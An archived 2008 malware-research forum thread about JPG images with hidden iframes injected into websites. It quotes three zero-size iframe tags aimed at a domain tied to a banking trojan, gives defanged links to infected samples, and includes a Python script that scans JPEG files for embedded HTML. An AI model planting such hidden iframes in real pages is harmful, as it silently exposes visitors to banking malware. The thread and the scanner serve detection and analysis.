Author Topic: W32/JPGiframer  (Read 5292 times)


August 03, 2008, 11:13:36 pm

sowhat-x

  • Guest
What the heck... thought I'd finally plan my summer vacation, yet again...
Seems that not even that can take place nowadays without stumbling across newer malware attacks...
Have 'fun' looking at this:

Quote
hxxp://www.xenonaskazakou.gr/
Now check out the jpg image in the homepage... ;)
(Also added as an attachment...pass is "infected")
Detection rate...8/36 (22.23%)
http://www.virustotal.com/analisis/063dcf189bdaf5a42378ec3c5c3a82af

Quote
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/hkeraone/hker.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>

The injected goldwindos2000 domain has already been in the list since late January.
Google also turned up the following ThreatExpert report from that time, Trojan-Spy.Banker.CCB:
http://www.threatexpert.com/report.aspx?uid=d399f86f-b341-4e1c-9a9c-822659b7721f
As with most malware nowadays, it's all about the money...

August 04, 2008, 01:10:35 am
Reply #1

pcaccent

  • Special Access
  • Sr. Member


  • 190
very interesting...

August 04, 2008, 07:24:57 am
Reply #2

tjs

  • Special Members
  • Sr. Member


  • 248
Hmm, so I've been digging into this and reading the JPG file format specs...

I noticed the string 'ducky' in the JFIF header and thought it might be a clue. It's not. This string is automatically added by Adobe Photoshop (so we know they used that to create the image).

I have a feeling that this might be the work of a file infector that targets files in the httpd directory... I've been unable to make this 'attack' work in a browser or email client so far... has anyone else had any luck?

TJS
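To make the "reading JPG file format specs" step concrete, here is an added example (not code from the thread or from any of the posters) that walks a JPEG's marker segments the way the spec lays them out, lists the APPn identifiers (so the "Ducky" string shows up as what it is: the APP12 segment written by Photoshop's Save for Web), and reports HTML tags found either inside a segment or in bytes appended after the End-Of-Image marker, which is where this kind of injected `<iframe>` usually ends up. The JPEG skeleton it scans is constructed inline so it runs offline; the iframe URL in it is a placeholder, not one of the domains from the thread.

```python
"""Walk a JPEG's marker segments and flag HTML hidden inside segments or
appended after the End-Of-Image (EOI) marker. Added example, not from the thread."""
import re
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Tags an image file has no business carrying. Case-insensitive, attributes allowed.
HTML_TAG_RE = re.compile(rb"<\s*(iframe|script|object|embed|meta)\b[^>]*>", re.IGNORECASE)


def walk_segments(data: bytes):
    """Return ([(marker_code, offset, payload), ...], offset_just_after_EOI_or_None).

    Per ITU T.81 every marker is 0xFF followed by a code byte; most segments then
    carry a big-endian 2-byte length that includes the length field itself.
    Entropy-coded data after SOS is skipped until the next real marker
    (0xFF00 is a stuffed byte and 0xFFD0-0xFFD7 are restart markers, not segments)."""
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos, segments = 2, []
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos:#x}")
        marker, start = data[pos + 1], pos
        pos += 2
        if marker == EOI:
            return segments, pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:      # TEM / RSTn carry no length
            segments.append((marker, start, b""))
            continue
        if pos + 2 > len(data):
            raise ValueError(f"truncated segment header at offset {start:#x}")
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        payload = data[pos + 2:pos + length]
        segments.append((marker, start, payload))
        pos += length
        if marker == SOS:                                  # skip the scan's entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return segments, None


def app_identifiers(segments):
    """Leading ASCII identifier of each APPn segment (0xE0-0xEF): JFIF, Exif, Ducky, ...
    'Ducky' is the APP12 segment Adobe Photoshop's Save for Web writes; on its own it is
    a tool fingerprint, not evidence of tampering."""
    ids = []
    for marker, _, payload in segments:
        if 0xE0 <= marker <= 0xEF:
            m = re.match(rb"[A-Za-z0-9_ ]+", payload)
            ids.append(m.group(0).decode("ascii") if m else "")
    return ids


def scan_for_injected_html(data: bytes):
    """Return [(location, matched_tag_bytes), ...] for HTML tags found in segment
    payloads or in any bytes trailing the EOI marker."""
    segments, eoi_end = walk_segments(data)
    findings = []
    for marker, offset, payload in segments:
        for m in HTML_TAG_RE.finditer(payload):
            findings.append((f"segment 0xFF{marker:02X} at {offset:#x}", m.group(0)))
    if eoi_end is not None and eoi_end < len(data):
        trailer = data[eoi_end:]
        for m in HTML_TAG_RE.finditer(trailer):
            findings.append((f"{len(trailer)} trailing bytes after EOI at {eoi_end:#x}", m.group(0)))
    return findings


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xFF" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg(trailer: bytes = b"", comment: bytes = b"") -> bytes:
    """Constructed test input (not a decodable picture): SOI, APP0 JFIF, APP12 Ducky,
    optional COM segment, a tiny SOS scan containing a stuffed 0xFF00, EOI, then trailer."""
    parts = [b"\xFF\xD8",
             _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"),
             _segment(0xEC, b"Ducky\x00\x01\x00\x04\x00\x00\x00\x3C")]
    if comment:
        parts.append(_segment(0xFE, comment))
    parts.append(_segment(SOS, b"\x01\x01\x00\x00\x3F\x00") + b"\x12\x34\xFF\x00\x56")
    parts.append(b"\xFF\xD9" + trailer)
    return b"".join(parts)


if __name__ == "__main__":
    # Placeholder URL; the real samples in the thread pointed at a different domain.
    sample = build_sample_jpeg(trailer=b"<iframe src=http://example.invalid/x.htm width=0 height=0></iframe>")
    print("APPn identifiers:", app_identifiers(walk_segments(sample)[0]))
    for where, tag in scan_for_injected_html(sample):
        print(f"{where}: {tag!r}")
```

Run it against a suspect file with `scan_for_injected_html(open(path, "rb").read())`. Note what the result does and does not tell you: a hit proves the file carries HTML, not that a given client will execute it; the bytes after EOI are ignored by any decoder that treats the file as an image, so whether the iframe ever loads depends on how the server and browser end up interpreting the file, which is consistent with the posters above being unable to trigger it.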

August 04, 2008, 01:10:46 pm
Reply #3

Serg

  • Special Members
  • Sr. Member


  • 132
"it's all about the money..."
Eh... but this iframe doesn't work :)

August 04, 2008, 02:44:07 pm
Reply #4

sowhat-x

  • Guest
Quote
... but this iframe doesn't work
Yep, at the current moment at least the referenced iframe link to goldwindos2000.com appears "inactive",
but this doesn't really mean a thing, that's why I referenced the ThreatExpert report...  ;)

I believe these lamers are currently in the early stages of experimenting with/searching for new injection techniques,
so I wouldn't really concentrate much on the domain itself...
but more on which browser/web app might be vulnerable out there...

August 04, 2008, 03:01:15 pm
Reply #5

sowhat-x

  • Guest
Heh, here we go - mystery solved (at least for the most part of it...)  :)
http://blog.scansafe.com/journal/2008/7/6/june-a-month-of-new-image-exploits.html
Plus...
http://www.viruslist.com/en/weblog?weblogid=208187540

And one more sample that I dug up while searching around...
Quote
hxxp://www.spinoza.gr/Images/home.gif

August 07, 2008, 05:24:57 pm
Reply #6

JohnC

  • Special Members
  • Hero Member


  • 1964

November 15, 2008, 03:58:04 pm
Reply #7

sowhat-x

  • Guest
Quote
hxxp://ly.wj.js.cn/Uppic/logo/2008724102151.gif
Result: 4/36 (11.12%)
http://www.virustotal.com/analisis/446dc2fe3c0aee3bc2d4888dbf284b1f